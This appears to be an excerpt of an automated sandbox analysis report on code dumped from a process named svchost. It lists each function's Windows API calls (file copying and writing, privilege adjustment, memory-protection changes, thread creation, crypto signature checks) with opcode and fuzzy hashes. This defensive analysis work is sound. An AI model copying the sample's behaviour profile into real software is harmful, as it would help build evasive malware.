Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,02EC51B9,?,02EC70E8,00000000,00000000,?), ref: 02EC2DC8
GetFileSize.KERNEL32(00000000,00000000,?,?,02EC51B9,?,02EC70E8,00000000,00000000,?,00000000), ref: 02EC2DDC
CloseHandle.KERNEL32(00000000,?,02EC51B9,?,02EC70E8,00000000,00000000,?,00000000), ref: 02EC2E4D

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 528380ce95887d4e3a7dff7f63b676c8cff8e3a7a28d88d4b172919c1f1dff96
Instruction ID: 47bc4dafb061e521c8b15bca9230081b98e4beaac92b6f1f017ef7819658e607
Opcode Fuzzy Hash: 528380ce95887d4e3a7dff7f63b676c8cff8e3a7a28d88d4b172919c1f1dff96
Instruction Fuzzy Hash: EF1184B1984211AFD7225FE1DC48B6BBB6CFB4A665F208929FE42D6240C730C453CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02EC4068 Relevance: 12.1, APIs: 8, Instructions: 63
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000009,?,02EC373D,?,00100000,00000006,?), ref: 02EC406D
RtlAllocateHeap.NTDLL(00000000,?,02EC373D), ref: 02EC4074
CreateFileMappingW.KERNELBASE(000000FF,02EC62B8,00000004,00000000,?,?,?,?,?,02EC373D,?,00100000,00000006,?), ref: 02EC409B
GetLastError.KERNEL32(?,?,?,02EC373D,?,00100000,00000006,?), ref: 02EC40A7
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,?,?,?,?,02EC373D,?,00100000,00000006,?), ref: 02EC40C6
CloseHandle.KERNEL32(00000000,?,?,?,02EC373D,?,00100000,00000006,?), ref: 02EC40D5
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,02EC373D,?,00100000,00000006,?), ref: 02EC40DE
HeapFree.KERNEL32(00000000,?,?,?,02EC373D,?,00100000,00000006,?), ref: 02EC40E5

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$AllocateCloseCreateErrorFreeHandleLastMappingView
String ID:
API String ID: 3951456143-0
Opcode ID: 9484dc582baaeea3121d595cb218ee7626432c67fa695da600258c45ad926413
Instruction ID: d328b8fb2ee2f16714712a9c7574fd799cec5a90a05e6a412a2fe5bc32db4b28
Opcode Fuzzy Hash: 9484dc582baaeea3121d595cb218ee7626432c67fa695da600258c45ad926413
Instruction Fuzzy Hash: 09118E316C4302AFD7208FA5AD49F56BBE8EF08724F21882CF695D6281C730D8518F20

Uniqueness

Uniqueness Score: -1.00%

Function 02EC1FE9 Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02EC1FF0
CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02EC2009
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02EC2014
CloseHandle.KERNEL32 ref: 02EC2025

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: CloseCreate$ChangeEventFindHandleNotificationThread
String ID:
API String ID: 3181087867-0
Opcode ID: 9cac17c368208df45735f2fce349f94da1bbbc430062967ae049de9aa9b81da9
Instruction ID: deddfdfc42332b67e600376d820b1b19a5c515d25b71b2eaddf111f4a150b343
Opcode Fuzzy Hash: 9cac17c368208df45735f2fce349f94da1bbbc430062967ae049de9aa9b81da9
Instruction Fuzzy Hash: B6E09A319D61316A96316BF7BC0EDC77E5DFF4A2B53A18935B909D0208D7208493DAF4

Uniqueness

Uniqueness Score: -1.00%

Function 02EC26ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02EC2709
RtlGetVersion.NTDLL(?), ref: 02EC271E

Part of subcall function 02EC3641: GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02EC2790), ref: 02EC3659

Strings

f<v, xrefs: 02EC27BD

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersionmemset
String ID: f<v
API String ID: 487673674-2911902482
Opcode ID: 936a6706c403b81d7524d41864d9ef78b23c66ac72c635c70f503176954079f0
Instruction ID: 1376097d72bac5111be3a84a899202d471ff0441b7e014adf847f8e610a23423
Opcode Fuzzy Hash: 936a6706c403b81d7524d41864d9ef78b23c66ac72c635c70f503176954079f0
Instruction Fuzzy Hash: 66212525CC42A85AD7199BF6AA41AD77FEC9F96300FA458F9D94C5330AD22004A7CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02EC492A Relevance: 5.1, APIs: 4, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,02EC70E8), ref: 02EC4982
HeapFree.KERNEL32(00000000,?,00000000,00000000,02EC70E8), ref: 02EC4989
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,02EC70E8), ref: 02EC49B1
HeapFree.KERNEL32(00000000,?,00000000,00000000,02EC70E8), ref: 02EC49B8

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 614454cb8597933465a117b49e09e5c22b41f6c62f6c7ab52c3ee3867cdadf6e
Instruction ID: 5a9b46c54391462e2ed93525f8ae9cd89fa2bef282d92fbd7e5b2ce26c5bd59b
Opcode Fuzzy Hash: 614454cb8597933465a117b49e09e5c22b41f6c62f6c7ab52c3ee3867cdadf6e
Instruction Fuzzy Hash: 64113172980219ABCB10CBE5D908BEFF7BCFB48319F2090A9ED04D6180E7309605CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC2C33 Relevance: 4.6, APIs: 3, Instructions: 74
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(02EC63B4,?), ref: 02EC2C67

Part of subcall function 02EC55BC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 02EC55D3
Part of subcall function 02EC55BC: CreateDirectoryW.KERNELBASE(?,02EC62B8), ref: 02EC561C

Part of subcall function 02EC2D40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC2D86
Part of subcall function 02EC2D40: RtlFreeHeap.NTDLL(00000000), ref: 02EC2D8D

lstrcpyW.KERNEL32(02EC63B4,?), ref: 02EC2CC7
lstrcatW.KERNEL32(?,02EC738C), ref: 02EC2CD9

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CreateDirectoryFolderFreePathProcesslstrcatlstrcpy
String ID:
API String ID: 2199617466-0
Opcode ID: 32bd0cf4ff74e7726e1b66e672495f59ab34ffbb86f136c46edf93d62ae05579
Instruction ID: 17f57b0806114e15785ccbeebddbe36c321066874c92c06fb9a4974685f2188a
Opcode Fuzzy Hash: 32bd0cf4ff74e7726e1b66e672495f59ab34ffbb86f136c46edf93d62ae05579
Instruction Fuzzy Hash: 3B2139B29802089FDB10DFE4DD49BDA77BCAF04304F60446AFA19E2151EB3096958F62

Uniqueness

Uniqueness Score: -1.00%

Function 02EC2833 Relevance: 4.6, APIs: 3, Instructions: 73
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExW.KERNELBASE(00000000,?,?,?,00000005), ref: 02EC2858
LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02EC287E
GetSystemTimeAsFileTime.KERNEL32(?,?,00000005), ref: 02EC28A3

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: NameTime$AccountComputerFileLookupSystem
String ID:
API String ID: 3076100934-0
Opcode ID: cd51ec7dd65d63025d1af0040284721f6e54443b5dcda49db2548635563b4e8a
Instruction ID: 68daf07cb88b531e167663ae6d8744d63cdf4403579414140d1c9f83a70381c0
Opcode Fuzzy Hash: cd51ec7dd65d63025d1af0040284721f6e54443b5dcda49db2548635563b4e8a
Instruction Fuzzy Hash: 08215E729842489FCB65CFA6E8849DB7BACEF45214B60012AFD19D3242D730D96BCB90

Uniqueness

Uniqueness Score: -1.00%

Function 02EC5108 Relevance: 4.6, APIs: 3, Instructions: 52
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02EC54AC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 02EC54C0
Part of subcall function 02EC54AC: CreateDirectoryW.KERNELBASE(00000000,02EC62B8), ref: 02EC5500

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02EC513A
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 02EC515E
CloseHandle.KERNEL32(00000000), ref: 02EC5167

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseDirectoryFolderHandlePathRead
String ID:
API String ID: 221032062-0
Opcode ID: 3999a4f2b1996c51883234643e5f63d41cdddfbfbe662f60e7fadd179dcf691b
Instruction ID: 1fccd9cbcb47b51930493e49be4483640c6709a07f4b2116490374864a74fa0f
Opcode Fuzzy Hash: 3999a4f2b1996c51883234643e5f63d41cdddfbfbe662f60e7fadd179dcf691b
Instruction Fuzzy Hash: E101A7725883087FD6305AA1EC4CF6BB79CE785774F618A2DFA51E2180D73165068671

Uniqueness

Uniqueness Score: -1.00%

Function 02EC2EBA Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02EC2D76,?,?,?,?), ref: 02EC2ED5
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,02EC2D76,?,?,?,?,?), ref: 02EC2EF4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,02EC2D76,?,?,?,?,?), ref: 02EC2EFD

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 2782cfceda2883b4358120195884235bc9ece95b80d967a995e597ec14423e0c
Instruction ID: d7319e99568fc7f7ac06137b5495e29b05f0d5b8503174f9b8bbcb1544a97b77
Opcode Fuzzy Hash: 2782cfceda2883b4358120195884235bc9ece95b80d967a995e597ec14423e0c
Instruction Fuzzy Hash: E8F0C831985118BFD72049A79C49FABBA5CEB45674F604625FE05E3180D370490296F0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC2D40 Relevance: 4.5, APIs: 3, Instructions: 43
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02EC2DAF: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,02EC51B9,?,02EC70E8,00000000,00000000,?), ref: 02EC2DC8

CopyFileW.KERNEL32(?,?,00000000), ref: 02EC2DA5

Part of subcall function 02EC2EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02EC2D76,?,?,?,?), ref: 02EC2ED5

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC2D86
RtlFreeHeap.NTDLL(00000000), ref: 02EC2D8D

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: File$CreateHeap$CopyFreeProcess
String ID:
API String ID: 2735472767-0
Opcode ID: 766a564efa65d8a55c11ec828825bedf41631ef8e0c6f52d8064d875550cca70
Instruction ID: 2a41784de03a1d7ae730524a533c712c038eeefb13da982ffaa977731b14607f
Opcode Fuzzy Hash: 766a564efa65d8a55c11ec828825bedf41631ef8e0c6f52d8064d875550cca70
Instruction Fuzzy Hash: 18012C76880118FBCF126FD0DD05ADDBF39EB05315F2095A5BE09A5110D7328A61DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02EC2674 Relevance: 4.5, APIs: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008007), ref: 02EC2679

Part of subcall function 02EC2973: lstrcpyW.KERNEL32(02EC62F2,02EC63B4), ref: 02EC298C
Part of subcall function 02EC2973: lstrcatW.KERNEL32(02EC62F0,02EC7338), ref: 02EC299C
Part of subcall function 02EC2973: SetUnhandledExceptionFilter.KERNEL32(Function_000017E8), ref: 02EC29A7

Part of subcall function 02EC26ED: memset.MSVCRT ref: 02EC2709
Part of subcall function 02EC26ED: RtlGetVersion.NTDLL(?), ref: 02EC271E

Part of subcall function 02EC3555: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02EC3570
Part of subcall function 02EC3555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02EC3585
Part of subcall function 02EC3555: GetLastError.KERNEL32 ref: 02EC358B
Part of subcall function 02EC3555: GetProcessHeap.KERNEL32(00000008,00000001), ref: 02EC35A1
Part of subcall function 02EC3555: RtlAllocateHeap.NTDLL(00000000), ref: 02EC35A8
Part of subcall function 02EC3555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02EC35C1
Part of subcall function 02EC3555: GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 02EC35CF
Part of subcall function 02EC3555: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02EC35F0
Part of subcall function 02EC3555: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC35FD
Part of subcall function 02EC3555: HeapFree.KERNEL32(00000000), ref: 02EC3604

ExitProcess.KERNEL32 ref: 02EC26E6

Part of subcall function 02EC25E3: lstrcpyW.KERNEL32(?,02EC7328), ref: 02EC25F6
Part of subcall function 02EC25E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02EC2612
Part of subcall function 02EC25E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02EC2623
Part of subcall function 02EC25E3: GetLastError.KERNEL32 ref: 02EC262D

Part of subcall function 02EC2C33: StrStrIW.KERNELBASE(02EC63B4,?), ref: 02EC2C67

Part of subcall function 02EC1BB9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC1BFF
Part of subcall function 02EC1BB9: HeapFree.KERNEL32(00000000), ref: 02EC1C06

Part of subcall function 02EC1FE9: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02EC1FF0
Part of subcall function 02EC1FE9: CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02EC2009
Part of subcall function 02EC1FE9: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02EC2014

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Create$ErrorEventToken$ChangeCloseFindFreeInformationLastNotificationlstrcpy$AllocateAuthorityExceptionExitFilterModeOpenThreadUnhandledVersionlstrcatmemset
String ID:
API String ID: 179549865-0
Opcode ID: 73f063bb3936b8adedd0ebb13a03ce9da25afb74bc6ce898193b2d829a0492de
Instruction ID: 5a03ae9fb1b41f6f4051d93f6dcb4e90ee64861c24cc1e4c4b000725b4816fab
Opcode Fuzzy Hash: 73f063bb3936b8adedd0ebb13a03ce9da25afb74bc6ce898193b2d829a0492de
Instruction Fuzzy Hash: 7AF015606C03425AEA0437F69F16A5E221A6F1030AF74F86CBE49C9295DE2498930E37

Uniqueness

Uniqueness Score: -1.00%

Function 02EC29F5 Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6381d37abbb98e98dd930013fa08b37f2f5a21dc2e51cb0114f16e36de429c
Instruction ID: 9722574c3fb3b3cb8cb8a3853298315793cc116b39019b6afa3be7356a35d176
Opcode Fuzzy Hash: 4d6381d37abbb98e98dd930013fa08b37f2f5a21dc2e51cb0114f16e36de429c
Instruction Fuzzy Hash: 335169716843029FE318CFA9D960AA773E8FF84214F25987DF956C7250E730E946CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02EC54AC Relevance: 3.1, APIs: 2, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 02EC54C0
CreateDirectoryW.KERNELBASE(00000000,02EC62B8), ref: 02EC5500

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: 18f90ccc16175271351ddd7b8bb2b5b26da07fe8290eef1dedde03644443b815
Instruction ID: a206910cecefc8c979ee44c03a41306db7ec9387a4040a27e202c394b7671a8f
Opcode Fuzzy Hash: 18f90ccc16175271351ddd7b8bb2b5b26da07fe8290eef1dedde03644443b815
Instruction Fuzzy Hash: B411B9669802187EF700A6E59C45DFF7BBCDF85660F20505BF904D7140E52869479B71

Uniqueness

Uniqueness Score: -1.00%

Function 02EC55BC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 02EC55D3
CreateDirectoryW.KERNELBASE(?,02EC62B8), ref: 02EC561C

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: e728d1d0f0fc0d0436ad06f13336d5b97f056479083e41657cd8decb8f310a4c
Instruction ID: faaf05ccaf84d29e122d55607e35539a15b1d8a3638840748f9368a8a2923bae
Opcode Fuzzy Hash: e728d1d0f0fc0d0436ad06f13336d5b97f056479083e41657cd8decb8f310a4c
Instruction Fuzzy Hash: C201B972AC01187EF70466E5ED8AD7FBB7CEB85A14B70401FF905D2140DD6479028A71

Uniqueness

Uniqueness Score: -1.00%

Function 02EC1BB9 Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC1BFF
HeapFree.KERNEL32(00000000), ref: 02EC1C06

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2d3dda9dbe9bdcdd6e6fc1ed15ee5b84e362c752b7fc9388f04e9fc4023124fb
Instruction ID: 72a11a0d514a6864c734fea4254792e238d6e65ffd8159d37e2af1ae9df966be
Opcode Fuzzy Hash: 2d3dda9dbe9bdcdd6e6fc1ed15ee5b84e362c752b7fc9388f04e9fc4023124fb
Instruction Fuzzy Hash: 47F05476D80108BBDF00EBE4CD05FDEB77CAB04305F604595FA14E6281E6719715DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02EC3641 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02EC2790), ref: 02EC3659

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: b50f7c53310d4df32b01dacfbaf60adeea96b78837750d85197d0cf247577fb6
Instruction ID: e00b9e14769cf9b0c26870b551e99037bd68c7e65e09b73ed2236ced7b099386
Opcode Fuzzy Hash: b50f7c53310d4df32b01dacfbaf60adeea96b78837750d85197d0cf247577fb6
Instruction Fuzzy Hash: 5ED0C233A5421C56CB00A6F9A9099CBF7FC9B8C620F1049B6E501E7140E871999547E0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC29AE Relevance: 1.3, APIs: 1, Instructions: 22sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC2BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02EC2BDA
Part of subcall function 02EC2BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02EC2C23

Sleep.KERNELBASE(000000FF), ref: 02EC29E9

Part of subcall function 02EC2674: SetErrorMode.KERNELBASE(00008007), ref: 02EC2679

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual$ErrorModeSleep
String ID:
API String ID: 46048798-0
Opcode ID: 78177fe1ba1c825fb17214419d67044b460cbbc692be738128f6ef5d56887ac9
Instruction ID: 62008a0187486d2ff30a3706cc395440236d144e9201b602e37dd341c8f05cc8
Opcode Fuzzy Hash: 78177fe1ba1c825fb17214419d67044b460cbbc692be738128f6ef5d56887ac9
Instruction Fuzzy Hash: B2E012319D01118FCA54A7E99A18BD632A47F08715F259675BE218B194D720CC93DB61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02EC3E7E Relevance: 12.1, APIs: 8, Instructions: 70encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,02EC73C8,00000001,F0000000,00000094,?), ref: 02EC3EA1
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,00000001), ref: 02EC3EBE
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 02EC3ED4
CryptImportKey.ADVAPI32(?,00000000,00000094,00000000,00000000,?), ref: 02EC3EF1
CryptVerifySignatureA.ADVAPI32(?,00000000,00000080,00000000,00000000,00000000), ref: 02EC3F0D
CryptDestroyKey.ADVAPI32(?), ref: 02EC3F18
CryptDestroyHash.ADVAPI32(?), ref: 02EC3F26
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02EC3F30

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportReleaseSignatureVerify
String ID:
API String ID: 972346567-0
Opcode ID: 67d03cecd87e871c9d0e58ba3d831be73ac861e1210b86d095df9e1ba06125d1
Instruction ID: 7146b95734f13f28e575de08f7ed033f0275219f742ec11c758084e836514282
Opcode Fuzzy Hash: 67d03cecd87e871c9d0e58ba3d831be73ac861e1210b86d095df9e1ba06125d1
Instruction Fuzzy Hash: 8321F936D80158BBCB215FD6DD09E9EFF7DEB84B11F2085A9F901A2150C7318A62EF50

Uniqueness

Uniqueness Score: -1.00%

Function 02EC2F1A Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(02EC7658,00000000,00000000,00000001,F0000000,02EC62B0,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2F35
CryptCreateHash.ADVAPI32(02EC7658,00008003,00000000,00000000,?,00000000,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2F52
CryptHashData.ADVAPI32(?,02EC7658,?,00000000,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2F68
CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2F83
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02EC5B88,?,00000000,?), ref: 02EC2FA3
CryptDestroyHash.ADVAPI32(?,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2FB3
CryptReleaseContext.ADVAPI32(02EC7658,00000000,?,?,?,02EC5B88,?,00000000,?,?,02EC7658,?), ref: 02EC2FC2

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDestroyParamRelease
String ID:
API String ID: 276068997-0
Opcode ID: a48c08992a495550589a6d5bc06374c5aab095d075b2912d465a7e7046ba0330
Instruction ID: f6d5dca5bc3ed887bcdf2b95214076e13fac46de54a76883bdf41eefd35a1a0e
Opcode Fuzzy Hash: a48c08992a495550589a6d5bc06374c5aab095d075b2912d465a7e7046ba0330
Instruction Fuzzy Hash: 41215B7288020CFFDB218FD1CD85AAEBB7CEB04258F2484A9FE00B2110D7318EA19F50

Uniqueness

Uniqueness Score: -1.00%

Function 02EC39E8 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,02EC1210,?,02EC71F0,?), ref: 02EC39F4
OpenProcessToken.ADVAPI32(00000000,?,02EC1210,?,02EC71F0,?), ref: 02EC39FB
LookupPrivilegeValueA.ADVAPI32(00000000,02EC71F0,02EC1210), ref: 02EC3A11
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02EC3A36
CloseHandle.KERNEL32(?,?,?,?,02EC1210,?,02EC71F0,?), ref: 02EC3A41

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 499c639bbda47b96670b6ed301539cdf0f3fbe811b0ee3cec08227dd09659ae5
Instruction ID: 38eb46e583ba87802ee75d64bbd3e6173e967b6007cc39698761be9da564099c
Opcode Fuzzy Hash: 499c639bbda47b96670b6ed301539cdf0f3fbe811b0ee3cec08227dd09659ae5
Instruction Fuzzy Hash: 9BF06D76C80118ABDB209AD6DD0DDAFBBBCEB88B10F504168BC00E2200D7308A55CBA0

Uniqueness

Uniqueness Score: -1.00%

